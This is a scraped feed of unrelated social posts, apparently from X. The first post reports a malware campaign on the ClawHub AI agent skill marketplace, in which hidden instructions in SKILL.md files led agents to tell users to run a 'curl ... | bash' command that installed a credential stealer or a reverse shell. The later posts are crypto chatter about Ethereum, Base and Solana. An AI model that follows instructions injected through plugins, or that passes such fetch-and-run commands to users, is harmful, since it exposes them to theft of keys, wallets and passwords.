hana

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

@Fiskantes the thing i dont unersatdn about eth promoting a ingle l2 as the answer is why even settle to eth at all once you have user trust/brand mindshare better than eth. at least fragmented l2 you can argue its a technical ux problem thats in theory solvable

A new, unified stack for Base Chain Excited to share that we are evolving our technical roadmap, consisting of our own spec, code, and infra to accelerate the foundation of Base. This shift gives us the autonomy to ship protocol improvements more frequently and focus our resources on scaling to 1 gigagas/s. What this means for builders: - Higher Velocity: Targeting 6 hardforks per year to get you new features and fixes faster. - Massive Scale: Targeting 1 gigagas/s to support high-throughput apps without congestion. - Extreme Reliability: Targeting 99.99% non-empty blocks and predictable, low fees. - Simpler Design: A maximally simple spec that’s easier to audit and build on. Along with this, we will take a more active role in managing our own upgrade schedule and stack: allowing us to build what the ecosystem needs, at the speed it needs, while remaining deeply aligned with Ethereum. Read the full technical breakdown here: blog.base.dev/next-chapter-f…

fake @dumbcontract2 now. stay safe anon

This is unseemly to post rn but today is likely to be one of the most insane onchain days we've ever seen, @Solana is consistently close to maxing out CUs per block and baseline non-vote TPS is sustaining 2k+ Solana is truly a remarkable piece of engineering